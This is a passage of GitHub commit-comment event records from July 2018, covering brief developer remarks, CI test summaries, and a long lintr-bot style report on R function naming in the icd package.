{"id":"7989712491","type":"CommitCommentEvent","actor":{"login":"ZHUIMEN"},"repo":{"name":"ZHUIMEN/gitTree"},"payload":{"comment":{"id":29765948,"position":null,"line":null,"path":null,"commit_id":"9a069227aa273d24608729363a6fdaf5783b8728","created_at":"2018-07-19T14:54:32Z","updated_at":"2018-07-19T14:54:32Z","author_association":"OWNER","body":"。。。。"}},"created_at":"2018-07-19T14:54:32Z"}
{"id":"7989718509","type":"CommitCommentEvent","actor":{"login":"joeyhuab"},"repo":{"name":"Magisk-Modules-Repo/Xiaomi-Mi-A1-Stock-Camera"},"payload":{"comment":{"id":29765959,"position":null,"line":null,"path":null,"commit_id":"a638ea6ad1ab546d6dc87f2c5e9a802a5d522ef3","created_at":"2018-07-19T14:55:25Z","updated_at":"2018-07-19T14:55:25Z","author_association":"COLLABORATOR","body":"Hi there. I have the latest Mi A1 stock Camera from our stock ROM. It has odex and vdex. Will you be able to patch it?"}},"created_at":"2018-07-19T14:55:25Z"}
{"id":"7989724080","type":"CommitCommentEvent","actor":{"login":"sanpangzi"},"repo":{"name":"sanpangzi/webrtc-demo"},"payload":{"comment":{"id":29765971,"position":null,"line":null,"path":null,"commit_id":"5506f400f157058d2bfa9995d42b8d13782fba27","created_at":"2018-07-19T14:56:16Z","updated_at":"2018-07-19T14:56:16Z","author_association":"OWNER","body":"come on"}},"created_at":"2018-07-19T14:56:16Z"}
{"id":"7989726888","type":"CommitCommentEvent","actor":{"login":"Avygeil"},"repo":{"name":"Avygeil/base_enhanced"},"payload":{"comment":{"id":29765977,"position":17,"line":2123,"path":"game/g_cmds.c","commit_id":"ff686371dee254f96e7281289d151d5805e9d63f","created_at":"2018-07-19T14:56:42Z","updated_at":"2018-07-19T14:56:42Z","author_association":"OWNER","body":"the FUCC is this"}},"created_at":"2018-07-19T14:56:42Z"}
{"id":"7989728926","type":"CommitCommentEvent","actor":{"login":"drewcallahan6"},"repo":{"name":"drewcallahan6/Regulatory-Request-Helper"},"payload":{"comment":{"id":29765984,"position":null,"line":null,"path":null,"commit_id":"6b97d47655c1985f5dc15d20a5608308d6ffe6cc","created_at":"2018-07-19T14:57:00Z","updated_at":"2018-07-19T14:57:00Z","author_association":"OWNER","body":"Regulatory Request Helper 32 Bit Version"}},"created_at":"2018-07-19T14:57:00Z"}
{"id":"7989734356","type":"CommitCommentEvent","actor":{"login":"xterior"},"repo":{"name":"xterior/xterior.github.io"},"payload":{"comment":{"id":29765998,"position":null,"line":null,"path":null,"commit_id":"c40bc09fe11539174ed3a7dd34b1081a8928c58d","created_at":"2018-07-19T14:57:49Z","updated_at":"2018-07-19T14:57:49Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-19T14:57:49Z"}
{"id":"7989736428","type":"CommitCommentEvent","actor":{"login":"xterior"},"repo":{"name":"xterior/xterior.github.io"},"payload":{"comment":{"id":29766002,"position":5,"line":45,"path":"sw.js","commit_id":"c40bc09fe11539174ed3a7dd34b1081a8928c58d","created_at":"2018-07-19T14:58:09Z","updated_at":"2018-07-19T14:58:09Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-19T14:58:09Z"}
{"id":"7989747366","type":"CommitCommentEvent","actor":{"login":"rap2hpoutre"},"repo":{"name":"betagouv/eac-api"},"payload":{"comment":{"id":29766027,"position":null,"line":null,"path":null,"commit_id":"f7cc3d8a838db1a515ecd6a723e128e34c58b77b","created_at":"2018-07-19T14:59:45Z","updated_at":"2018-07-19T14:59:45Z","author_association":"MEMBER","body":"@vinyll Le but de ce commit est de préserver les modifications manuelles quand on reseed la base : cela signifie qu'on peut commencer à ajouter et éditer des acteurs/actions en ligne et elles ne seront pas écrasées lors de la mise à jour de la base. Autrement dit on peut rejouer le script de génération de la base sur une base existante sans rien perdre (normalement ;) )"}},"created_at":"2018-07-19T14:59:45Z"}
{"id":"7989754828","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29766049,"position":41,"line":82,"path":"desktop/src/com/frostwire/gui/components/transfers/TransferDetailTrackers.java","commit_id":"af413af2fd4fe90e97bad5581c5b7e7ea4dad2fe","created_at":"2018-07-19T15:00:49Z","updated_at":"2018-07-19T15:00:49Z","author_association":"COLLABORATOR","body":"👍 "}},"created_at":"2018-07-19T15:00:49Z"}
{"id":"7989758429","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/msgu"},"payload":{"comment":{"id":29766055,"position":null,"line":null,"path":null,"commit_id":"d1dbfe1d22a3abffb74d560311515cd4809dec67","created_at":"2018-07-19T15:01:20Z","updated_at":"2018-07-19T15:01:20Z","author_association":"OWNER","body":"Created multidev environment [msgu#pr-1](https://dashboard.pantheon.io/sites/a133f0bb-8664-4ab1-8026-2ca11ca8aa7e#pr-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-msgu.pantheonsite.io/)"}},"created_at":"2018-07-19T15:01:20Z"}
{"id":"7989761578","type":"CommitCommentEvent","actor":{"login":"adriweb"},"repo":{"name":"adriweb/emgiac"},"payload":{"comment":{"id":29766059,"position":112,"line":3522,"path":"giac/xcasfr.html","commit_id":"32a9222f32da7391d7d4710c8e01adaa60489cce","created_at":"2018-07-19T15:01:49Z","updated_at":"2018-07-19T15:01:49Z","author_association":"OWNER","body":"Ca devrait être bon désormais.\r\nJ'en ai profité pour \"travailler\" sur la meilleure détection de browser pour mathjax etc: 46bdd1a61c05257cdc2b193f10a0e533003a5653"}},"created_at":"2018-07-19T15:01:49Z"}
{"id":"7989763547","type":"CommitCommentEvent","actor":{"login":"RalfJung"},"repo":{"name":"rust-lang/rust"},"payload":{"comment":{"id":29766062,"position":19,"line":1625,"path":"src/librustc_lint/builtin.rs","commit_id":"cde241eafb4a261ee680fc7a841dc46f9a5d0021","created_at":"2018-07-19T15:02:08Z","updated_at":"2018-07-19T15:02:08Z","author_association":"MEMBER","body":"Under which conditions could `err` be `None`?\r\n\r\nThe code seems to say it never is `None`, which which case (a) I wonder about the type, and (b) shouldn't this rather `unwrap`?"}},"created_at":"2018-07-19T15:02:08Z"}
{"id":"7989763817","type":"CommitCommentEvent","actor":{"login":"saltysnacks"},"repo":{"name":"turboapps/turbome"},"payload":{"comment":{"id":29766064,"position":null,"line":null,"path":null,"commit_id":"68b7a75e2d55ccac17537858dd0542388ddc8fe1","created_at":"2018-07-19T15:02:11Z","updated_at":"2018-07-19T15:02:11Z","author_association":"CONTRIBUTOR","body":"Thanks.  \r\n\r\nShould only do this if the version isn't specified by the caller."}},"created_at":"2018-07-19T15:02:11Z"}
{"id":"7989765347","type":"CommitCommentEvent","actor":{"login":"Avygeil"},"repo":{"name":"Avygeil/base_enhanced"},"payload":{"comment":{"id":29766067,"position":17,"line":2123,"path":"game/g_cmds.c","commit_id":"ff686371dee254f96e7281289d151d5805e9d63f","created_at":"2018-07-19T15:02:24Z","updated_at":"2018-07-19T15:02:24Z","author_association":"OWNER","body":"ah yeah i forgot to finish it"}},"created_at":"2018-07-19T15:02:24Z"}
{"id":"7989779681","type":"CommitCommentEvent","actor":{"login":"PeterMatula"},"repo":{"name":"avast-tl/retdec"},"payload":{"comment":{"id":29766093,"position":6,"line":5,"path":"scripts/retdec-tests-runner.py","commit_id":"6c0449dd2b3a4f0032b3b5538eb41b8acc84e9f0","created_at":"2018-07-19T15:04:36Z","updated_at":"2018-07-19T15:04:36Z","author_association":"MEMBER","body":"Yes, but see 7429c6c31b1d3ea2fb066fad7ba254a0a26f7894 - we are faking it so it is not necessary. If you have it, output will be nicer, but it will not fail if you don't."}},"created_at":"2018-07-19T15:04:36Z"}
{"id":"7989779900","type":"CommitCommentEvent","actor":{"login":"mcd500"},"repo":{"name":"columbia-irt/rtptools"},"payload":{"comment":{"id":29766094,"position":null,"line":null,"path":null,"commit_id":"b362334560dc1020fddd44587f7a9be189da7d8a","created_at":"2018-07-19T15:04:39Z","updated_at":"2018-07-19T15:04:39Z","author_association":"CONTRIBUTOR","body":"Am, are we really talking bout the variable `start` on line 261 in `main()` in `rtplay.c`? \r\nThe line from 256 to 385 is `main()` and the `start` value read by `RD_header((in, &sin, &start, verbose)` is not used in the line from 256 to 385 is `main()`. The reason I changed the `RD_header((in, &sin, &start, verbose)` for `rtpdump.c`. \r\nWould you mind expressing your thoughts by the code in the comment of your idea about how the change your would make?\r\nI really do not feel we are on the same page here."}},"created_at":"2018-07-19T15:04:39Z"}
{"id":"7989787351","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29766113,"position":null,"line":null,"path":null,"commit_id":"5aed00ce594da09cbe4854fc5ad1641917dc2c58","created_at":"2018-07-19T15:05:49Z","updated_at":"2018-07-19T15:05:49Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-MacOS-10.9-clang: Tests Failed (2008 of 2944 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 2 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: Table big diffs.\n * 2 tests had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 620\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-68.21%25-red.png)</a> \n"}},"created_at":"2018-07-19T15:05:49Z"}
{"id":"7989788511","type":"CommitCommentEvent","actor":{"login":"datanadz"},"repo":{"name":"datanadz/DataScience"},"payload":{"comment":{"id":29766116,"position":null,"line":null,"path":null,"commit_id":"96ef0d4505bc93a285059707c7df366c93eef9e8","created_at":"2018-07-19T15:05:59Z","updated_at":"2018-07-19T15:05:59Z","author_association":"OWNER","body":"Using pandas to split column content over a single row"}},"created_at":"2018-07-19T15:05:59Z"}
{"id":"7989793730","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":29766131,"position":null,"line":null,"path":null,"commit_id":"bdad11811f236b6ece4a2a5637f90d8b4db7f70c","created_at":"2018-07-19T15:06:48Z","updated_at":"2018-07-19T15:06:48Z","author_association":"NONE","body":"[R/as_char_no_warn.R:27:12:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/R/as_char_no_warn.R#L27) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return(fastIntToStringRcpp(x))\n           ^~~~~~~~~~~~~~~~~~~\n```\n[R/categorize.R:63:39:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/R/categorize.R#L63) *style:* **Variable and function names should be all lowercase.**\n```r\n​                       comorbid_fun = comorbidMatMul,\n                                      ^~~~~~~~~~~~~~\n```\n[R/categorize.R:169:39:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/R/categorize.R#L169) *style:* **Variable and function names should be all lowercase.**\n```r\n​                       comorbid_fun = comorbidMatMulSimple,\n                                      ^~~~~~~~~~~~~~~~~~~~\n```\n[R/comorbid.R:215:42:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/R/comorbid.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​                          comorbid_fun = comorbidMatMulSimple,\n                                         ^~~~~~~~~~~~~~~~~~~~\n```\n[R/guess.R:132:1:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/R/guess.R#L132) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​guess_version.data.frame <- function(x, short_code = NULL, icd_name = NULL, ...) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/guess.R:191:10:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/R/guess.R#L191) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​  ver <- guess_version.data.frame(x, icd_name = icd_name)\n         ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/parse.R:268:10:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/R/parse.R#L268) *style:* **Variable and function names should be all lowercase.**\n```r\n​  out <- fixSubchapterNa(out, \"740\", \"759\")\n         ^~~~~~~~~~~~~~~\n```\n[R/parse.R:270:10:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/R/parse.R#L270) *style:* **Variable and function names should be all lowercase.**\n```r\n​  out <- fixSubchapterNa(out, \"280\", \"289\")\n         ^~~~~~~~~~~~~~~\n```\n[R/parse.R:304:1:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/R/parse.R#L304) *style:* **Variable and function names should be all lowercase.**\n```r\n​fixSubchapterNa <- function(x, start, end) {\n^~~~~~~~~~~~~~~\n```\n[R/score.R:74:1:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/R/score.R#L74) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​charlson.data.frame <- function(x, visit_name = NULL,\n^~~~~~~~~~~~~~~~~~~\n```\n[R/score.R:308:1:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/R/score.R#L308) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​van_walraven.data.frame <- function(x, visit_name = NULL, return_df = FALSE,\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/util.R:189:1:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/R/util.R#L189) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​get_visit_name.data.frame <- function(x, visit_name = NULL) {\n^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:606:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-comorbid-maps-icd9.R#L606) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\"),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:616:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-comorbid-maps-icd9.R#L616) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 1, chunk_size = 32),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:617:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-comorbid-maps-icd9.R#L617) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 3, chunk_size = 32)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:620:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-comorbid-maps-icd9.R#L620) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 2, chunk_size = 32),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:621:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-comorbid-maps-icd9.R#L621) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 5, chunk_size = 32)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:624:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-comorbid-maps-icd9.R#L624) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 3, chunk_size = 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:625:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-comorbid-maps-icd9.R#L625) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 3, chunk_size = 32)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:628:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-comorbid-maps-icd9.R#L628) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts - 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:629:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-comorbid-maps-icd9.R#L629) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:632:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-comorbid-maps-icd9.R#L632) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts - 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:633:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-comorbid-maps-icd9.R#L633) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts + 1)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:636:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-comorbid-maps-icd9.R#L636) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts + 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:637:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-comorbid-maps-icd9.R#L637) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:652:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-comorbid-maps-icd9.R#L652) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\"),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:284:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L284) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = NA)), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:285:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L285) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"\")), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:286:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L286) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"1\")), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:287:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L287) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", NA), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:288:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L288) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"\"), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:289:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L289) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"1\"), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:295:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L295) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfempty), character())\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:296:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L296) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfe2), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:297:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L297) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"trout\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:298:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L298) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"23\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:299:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L299) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:300:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L300) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = NA)), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:309:18:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L309) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"100\", mnr = mn)), \"100\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:310:18:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L310) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"10\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:311:18:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L311) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"010\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:312:18:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L312) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"001\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:313:18:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L313) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"01\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:314:18:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L314) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"1\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:319:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L319) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"1\", mnr = \"23\")), \"00123\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:320:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L320) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"01\", mnr = \"23\", stringsAsFactors = TRUE)), \"00123\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:321:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L321) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"001\", mnr = \"23\")), \"00123\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:322:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L322) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"10\", mnr = \"23\", stringsAsFactors = TRUE)), \"01023\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:323:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L323) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"010\", mnr = \"23\")), \"01023\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:324:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L324) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"100\", mnr = \"23\", stringsAsFactors = TRUE)), \"10023\")\n               